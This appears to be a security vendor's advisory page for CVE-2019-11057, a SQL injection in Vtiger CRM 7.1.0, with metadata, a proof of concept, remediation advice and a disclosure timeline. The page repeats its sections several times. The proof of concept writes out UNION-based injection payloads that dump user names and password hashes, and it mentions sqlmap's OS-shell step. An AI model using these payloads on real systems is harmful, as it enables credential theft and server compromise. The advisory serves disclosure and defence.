CVE-2019-11057: SQL Injection in Vtiger CRM v7.1.0

01/Description

What this actually is.

Technical background, root cause, and affected surface.

SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application.

Vendor: Vtiger
Affected Product: Vtiger CRM
CVE: CVE-2019-11057
Securin ID: 2019-CSW-10-25
Status: Fixed
Date: April 3, 2019
Severity: High
CVSS Score: 8.8
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89

02/Proof of Concept

From one request
to root shell.

Reproduced in a sandboxed environment. Requires only LAN or WiFi adjacency.

VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

ScopeUnchanged

ImpactC:H / I:H / A:H

SeverityHigh

PoC · Exploitation Steps▲ trigger

01Figure1: Testing if the src_record parameter is vulnerable to SQLi with a single quotation mark(‘).02Note: The figure shows that the query was unsuccessful, and the length of the response is 9,690 bytes. SQL Injection03Figure2: Testing if the src_record parameter is vulnerable to SQLi with 2 single quotation marks (‘’).04Note: The figure shows that the query was successful, and the length of response is 10,957 bytes verifying that the parameter is vulnerable to SQL injection.05Figure3: Checking the version of the SQL database by exploiting SQLi.06Query Used: “-3096 union select 100′ UNION ALL SELECT version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL— IJXL ”07Figure 4: Finding the name of the current database.08Query Used: “-3096 union select 100′ UNION ALL SELECT database(),NULL,NULL,NULL,NULL,NULL,NULL,NULL—IJXL”09Figure 5: Finding tables in the current database.10Query Used: “-3096 union select 100′ UNION ALL SELECT group_concat(table_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.tables where table_schema=database()—IJXL”11Figure 6: Finding names of columns in the vtiger_users table.12Query Used: “-3096 union select 100′ UNION ALL SELECT group_concat(column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_name=”vtiger_users”– IJXL”13Figure 7: Extracting data from the vtiger_users table.14Query Used:” -3096 union select 100′ UNION ALL SELECTgroup_concat(id,0x3a,user_name,0x3a,user_password,0x3a,first_name),NULL,NULL,NULL,NULL,NULL, NULL,NULL from vtiger_users– IJXL”15Figure 8: Checking if the current user is a database administrator with sqlmap.16Figure 9: Gaining shell and running OS-level commands using –os-shell switch in sqlmap.

03/Impact

What an attacker does to you.

Post-exploitation outcomes mapped to CVSS impact metrics.

Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following type of attacks successfully:

• Reading, updating and deleting arbitrary data/tables from the database

• Executing commands on the underlying operating system

04/Remediation

Fix it. In this order.

A runbook, not a checklist. Sequence matters — assume compromise before you act.

Use prepared statements with parameterized queries when dealing with SQL queries that contain user input. Parameterized queries allow the database to understand which parts of the SQL query should be considered as user input, therefore solving SQL injection.

Please refer the OWASP SQL Injection Prevention Cheat Sheet for more information on how to fix SQL injection at https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SQL_Injection_Prevention_Che at_Sheet.md

Securin advisory — For coordinated remediation support or threat-actor briefings related to CVE-2019-11057, contact disclose@securin.io

05/Disclosure Timeline

Vendors moved in days.
Attackers in hours.

Reconstructed from vendor advisories, CISA bulletins, and Securin research records.

Mar 20, 2019

Vulnerability Discovered in Vtiger CRM

Apr 03, 2019

Vendor Released Fix

Vendor Released Fix Apr 09, 2019

CVE Assigned

Disclosed 14 days after discovery

06/References

Cite, verify, go deeper.

Primary sources — NVD, CISA KEV, and machine-readable IoC feed.

NVD

NVD — CVE-2019-11057

nvd.nist.gov/vuln/detail/CVE-2019-11057 →

SEC

Securin VI — Full Technical Analysis

vi.securin.io →

01/Description

What this actually is.

Technical background, root cause, and affected surface.

SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application.

Vendor: Vtiger
Affected Product: Vtiger CRM
CVE: CVE-2019-11057
Securin ID: 2019-CSW-10-25
Status: Fixed
Date: April 3, 2019
Severity: High
CVSS Score: 8.8
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89

02/Proof of Concept

From one request
to root shell.

Reproduced in a sandboxed environment. Requires only LAN or WiFi adjacency.

VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

ScopeUnchanged

ImpactC:H / I:H / A:H

SeverityHigh

PoC · Exploitation Steps▲ trigger

03/Impact

What an attacker does to you.

Post-exploitation outcomes mapped to CVSS impact metrics.

Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following type of attacks successfully:

• Reading, updating and deleting arbitrary data/tables from the database

• Executing commands on the underlying operating system

04/Remediation

Fix it. In this order.

A runbook, not a checklist. Sequence matters — assume compromise before you act.

Securin advisory — For coordinated remediation support or threat-actor briefings related to CVE-2019-11057, contact disclose@securin.io

05/Disclosure Timeline

Vendors moved in days.
Attackers in hours.

Reconstructed from vendor advisories, CISA bulletins, and Securin research records.

Mar 20, 2019

Vulnerability Discovered in Vtiger CRM

Apr 03, 2019

Vendor Released Fix

Vendor Released Fix Apr 09, 2019

CVE Assigned

Disclosed 14 days after discovery

06/References

Cite, verify, go deeper.

Primary sources — NVD, CISA KEV, and machine-readable IoC feed.

NVD

NVD — CVE-2019-11057

nvd.nist.gov/vuln/detail/CVE-2019-11057 →

SEC

Securin VI — Full Technical Analysis

vi.securin.io →

SQL Injection in Vtiger CRM

What this actually is.

From one request
to root shell.

What an attacker does to you.

Fix it. In this order.

Vendors moved in days.
Attackers in hours.

Vulnerability Discovered in Vtiger CRM

Vendor Released Fix

CVE Assigned

Cite, verify, go deeper.

NVD — CVE-2019-11057

Securin VI — Full Technical Analysis

Let Securin level up your security posture.

SQL Injection in Vtiger CRM

What this actually is.

From one request
to root shell.

What an attacker does to you.

Fix it. In this order.

Vendors moved in days.
Attackers in hours.

Vulnerability Discovered in Vtiger CRM

Vendor Released Fix

CVE Assigned

Cite, verify, go deeper.

NVD — CVE-2019-11057

Securin VI — Full Technical Analysis

Let Securin level up your security posture.

SQL Injection in Vtiger CRM

What this actually is.

From one requestto root shell.

What an attacker does to you.

Fix it. In this order.

Vendors moved in days.Attackers in hours.

Vulnerability Discovered in Vtiger CRM

Vendor Released Fix

CVE Assigned

Cite, verify, go deeper.

NVD — CVE-2019-11057

Securin VI — Full Technical Analysis

Let Securin level up your security posture.

SQL Injection in Vtiger CRM

What this actually is.

From one requestto root shell.

What an attacker does to you.

Fix it. In this order.

Vendors moved in days.Attackers in hours.

Vulnerability Discovered in Vtiger CRM

Vendor Released Fix

CVE Assigned

Cite, verify, go deeper.

NVD — CVE-2019-11057

Securin VI — Full Technical Analysis

Let Securin level up your security posture.

From one request
to root shell.

Vendors moved in days.
Attackers in hours.

From one request
to root shell.

Vendors moved in days.
Attackers in hours.